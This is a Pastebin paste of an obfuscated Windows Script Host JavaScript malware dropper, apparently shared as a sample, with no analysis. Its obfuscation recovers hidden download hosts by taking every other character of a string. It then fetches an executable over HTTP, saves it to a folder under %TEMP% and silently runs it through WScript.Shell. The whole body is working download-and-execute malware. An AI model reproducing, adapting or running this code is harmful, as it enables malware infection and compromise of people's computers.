API tools faq
paste
Advertisement
dynamoo

Malicious Javascript

dynamoo
Feb 29th, 2016
386
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.51 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. function PnENwlyvJ(vHjcaOQlznv) {
  4. var NphasvLL = WScript.CreateObject("Wscript.Shell");
  5. NphasvLL.Run(vHjcaOQlznv, 0x1, 0x0);
  6. }
  7. function HOpGucZue(WeMHq,Bvmzy,woTkH) {
  8. var kqMgQ = "jZQvsR MHu pt.Shell nutmHCF Scri".split(" ");
  9. var kYZ=((1)?"W" + kqMgQ[4]:"")+kqMgQ[2];
  10. var oI = WScript.CreateObject(kYZ);
  11. var zK = "%TEMP%\\";
  12. return oI.ExpandEnvironmentStrings(zK);
  13. }
  14. function mfPDpXYb() {
  15. var PiRQwTc = "ipting";
  16. var EPfJUumpGx = "ile";
  17. var sUKZH = "System";
  18. return "Sc" + "r" + PiRQwTc + ".F" + EPfJUumpGx + sUKZH + "Obj" + "ect";
  19. }
  20. function MMOt(EXjbN) {
  21. return WScript.CreateObject(EXjbN);
  22. }
  23. function NIwF(BsRNx,OGReG) {
  24. BsRNx.write(OGReG);
  25. }
  26. function AJsz(gaXUm) {
  27. gaXUm.open();
  28. }
  29. function AYMy(nklNg,sCjDD) {
  30. nklNg.saveToFile(sCjDD,542-540);
  31. }
  32. function vOjl(FPpRI,UoIZQ,MXtkg) {
  33. FPpRI.open(MXtkg,UoIZQ,false);
  34. }
  35. function CgWa(JfBRD) {
  36. if (JfBRD == 864-664){return true;} else {return false;}
  37. }
  38. function HlTW(EoAPD) {
  39. if (EoAPD > 176425-148){return true;} else {return false;}
  40. }
  41. function NMLT(UHZEQ) {
  42. var TKMXZ="";
  43. for(x=(153-153); x < UHZEQ.length; x++)
  44. if (x % (849-847) != (256-256)) {
  45. TKMXZ += UHZEQ.substr(x, 241-240);
  46. }
  47. return TKMXZ;
  48. }
  49. function oVGt(bXoBQ) {
  50. bXoBQ.send();
  51. }
  52. function lQWj(BoMrR) {
  53. return BoMrR.status;
  54. }
  55. var Yo="yhGeelDlQoDyXu9nGgWm1eLnTqRqm.ecFoems/D6l98.7esxAe9?F Lo1hNihyVobudnQgYbcuNyhfGfZ.LcGo8mH/T6i9o.teVxceS?u Y?A J?U v?";
  56. var c = NMLT(Yo).split(" ");
  57. var LrW = HOpGucZue("hqwL","dwqHr","hgrELU");
  58. var auz = new ActiveXObject(mfPDpXYb());
  59. var boAJ = LrW+"elbCzuv\\";
  60. try{
  61. auz.CreateFolder(boAJ);
  62. }catch(QaqnaZ){
  63. };
  64. var yng = "2.XMLH";
  65. var rKV = (yng + "TTP" + " KopxpjI YNeoY XML ream St sPdOQrOb AD rzIcuTc OD").split(" ");
  66. var sp = true  , RZce = rKV[7] + "" + rKV[9];
  67. var mL = MMOt("MS"+rKV[3]+(306427, rKV[0]));
  68. var Wub = MMOt(RZce + "B." + rKV[5]+(825927, rKV[4]));
  69. var KbI = 0;
  70. var i = 1;
  71. var dTtgsXS = 912892;
  72. var h=KbI;
  73. while (true)  {
  74. if(h>=c.length) {break;}
  75. var Wt = 0;
  76. var MQv = ("ht" + " DOFHPHM tp whdfV gambqeDe :// bXPmNZP .exe  GET").split(" ");
  77. try  {
  78. vOjl(mL,MQv[0]+MQv[2]+MQv[5]+c[h]+i, "GET"); oVGt(mL); if (CgWa(lQWj(mL)))  {      
  79. AJsz(Wub); Wub.type = 1; NIwF(Wub,mL.responseBody); if (HlTW(Wub.size))  {
  80. Wt = 1; Wub.position = 0; AYMy(Wub,/*qWMW72LFKl*/boAJ/*gr7c91tcbM*/+dTtgsXS+MQv[7]); try  {
  81. if (((new Date())>0,7448464888)) {
  82. PnENwlyvJ(boAJ+dTtgsXS+/*C8KP47dYcj*/MQv[7]/*kGIG32ZLIA*/);
  83. break;
  84. }
  85. }
  86. catch (ra)  {
  87. };
  88. }; Wub.close();
  89. };
  90. if (Wt == 1)  {
  91. KbI = h; break;
  92. };
  93. }
  94. catch (ra)  {
  95. };
  96. h++;
  97. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!